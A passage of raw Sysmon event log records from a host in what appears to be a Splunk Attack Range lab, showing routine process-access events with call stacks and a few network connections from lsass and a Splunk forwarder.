C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048286Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.725{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048285Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.725{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048284Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.725{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048283Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.725{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048282Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.725{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048281Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.725{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048280Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.725{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048279Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.725{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048278Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.725{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048277Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.725{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048276Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.725{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048275Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.678{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048274Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.678{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048273Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.678{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048272Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.678{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048271Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.678{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048270Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.678{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 354300x80000000000000001048269Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:23.755{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57255-false10.0.1.14win-dc-890.attackrange.local49676- 354300x80000000000000001048268Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:23.623{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 